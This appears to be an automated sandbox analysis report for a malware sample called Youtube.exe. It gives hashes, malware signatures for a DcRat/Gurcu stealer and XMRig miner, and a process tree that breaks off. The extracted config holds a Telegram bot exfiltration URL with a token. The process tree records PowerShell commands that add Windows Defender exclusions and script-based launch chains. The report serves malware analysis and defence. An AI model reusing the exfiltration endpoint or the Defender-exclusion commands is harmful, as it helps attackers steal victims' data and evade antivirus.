Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    17-07-2024 13:00

General

  • Target

    Youtube.exe

  • Size

    8.7MB

  • MD5

    d25ebdfc04bdadea74017fa72f90781f

  • SHA1

    f7278c4d04fc4db888368e0245d7607d8bcbb557

  • SHA256

    9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f

  • SHA512

    77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71

  • SSDEEP

    196608:fE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5m:fE9B0OjrdLK4J/Y

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendPhoto?chat_id=7391062786&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20e528f75fd273211ca4b0ac63578672932ff28b11%0A%E2%80%A2%20Comment%3A%20br0ken%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20EHECWUZY%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CDriversavessessionDlldhcp%5CSearchHost.ex

Signatures

  • DcRat 64 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies WinLogon for persistence 2 TTPs 23 IoCs
  • Process spawned unexpected child process 64 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • DCRat payload 6 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • XMRig Miner payload 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 43 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • .NET Reactor proctector 1 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 46 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 36 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Youtube.exe
    "C:\Users\Admin\AppData\Local\Temp\Youtube.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4428
    • C:\Users\Admin\AppData\Local\Temp\Result.exe
      "C:\Users\Admin\AppData\Local\Temp\Result.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4944
      • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3976
        • C:\Windows\SysWOW64\msiexec.exe
          "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1360
        • C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe
          "C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart
          4⤵
          • Executes dropped EXE
          PID:5772
          • C:\Windows\Temp\{74FB1068-56AE-4C8B-BA11-D81D0EF69682}\.cr\vc_redist.x64.exe
            "C:\Windows\Temp\{74FB1068-56AE-4C8B-BA11-D81D0EF69682}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" -burn.filehandle.attached=580 -burn.filehandle.self=576 /install /quiet /norestart
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:976
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pizzaboxer/bloxstrap/releases/download/v2.5.4/Bloxstrap-v2.5.4.exe
          4⤵
          • Enumerates system info in registry
          • NTFS ADS
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:5336
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0xa0,0x7ffec26b3cb8,0x7ffec26b3cc8,0x7ffec26b3cd8
            5⤵
              PID:6060
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1880 /prefetch:2
              5⤵
                PID:5976
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:3
                5⤵
                  PID:5376
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
                  5⤵
                    PID:2400
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
                    5⤵
                      PID:5320
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                      5⤵
                        PID:5236
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
                        5⤵
                          PID:240
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5656 /prefetch:8
                          5⤵
                            PID:1292
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
                            5⤵
                              PID:3296
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
                              5⤵
                                PID:6004
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
                                5⤵
                                  PID:1360
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
                                  5⤵
                                    PID:1884
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 /prefetch:8
                                    5⤵
                                      PID:4324
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5764 /prefetch:8
                                      5⤵
                                        PID:5208
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2492 /prefetch:8
                                        5⤵
                                        • NTFS ADS
                                        PID:5216
                                      • C:\Users\Admin\Downloads\Bloxstrap-v2.5.4.exe
                                        "C:\Users\Admin\Downloads\Bloxstrap-v2.5.4.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        PID:4296
                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"
                                      4⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:5700
                                      • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=5700.4360.6665655933552135156
                                        5⤵
                                        • Enumerates system info in registry
                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                        PID:5660
                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x10c,0x110,0x114,0xe8,0x1b8,0x7ffec26b3cb8,0x7ffec26b3cc8,0x7ffec26b3cd8
                                          6⤵
                                            PID:4680
                                          • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                            "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1816,11774696126090439537,3485126212305096615,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1856 /prefetch:2
                                            6⤵
                                              PID:5328
                                            • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                              "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1816,11774696126090439537,3485126212305096615,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=1920 /prefetch:3
                                              6⤵
                                                PID:5800
                                              • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1816,11774696126090439537,3485126212305096615,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2504 /prefetch:8
                                                6⤵
                                                  PID:5876
                                                • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                  "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1816,11774696126090439537,3485126212305096615,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
                                                  6⤵
                                                    PID:1672
                                                  • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                    "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1816,11774696126090439537,3485126212305096615,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=4468 /prefetch:8
                                                    6⤵
                                                      PID:5696
                                              • C:\Users\Admin\AppData\Local\Temp\solara.exe
                                                "C:\Users\Admin\AppData\Local\Temp\solara.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Modifies registry class
                                                • Suspicious use of WriteProcessMemory
                                                PID:4964
                                                • C:\Windows\SysWOW64\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1284
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "
                                                    5⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:772
                                                    • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
                                                      "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
                                                      6⤵
                                                      • Modifies WinLogon for persistence
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2188
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
                                                        7⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2068
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Registry.exe'
                                                        7⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:420
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\RuntimeBroker.exe'
                                                        7⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:336
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dwm.exe'
                                                        7⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2892
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\en-US\SppExtComObj.exe'
                                                        7⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2352
                                                      • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
                                                        "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
                                                        7⤵
                                                        • Modifies WinLogon for persistence
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        • Drops file in Windows directory
                                                        • Modifies registry class
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:676
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4972
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PrintDialog\Assets\backgroundTaskHost.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2188
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\My Documents\sppsvc.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3112
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
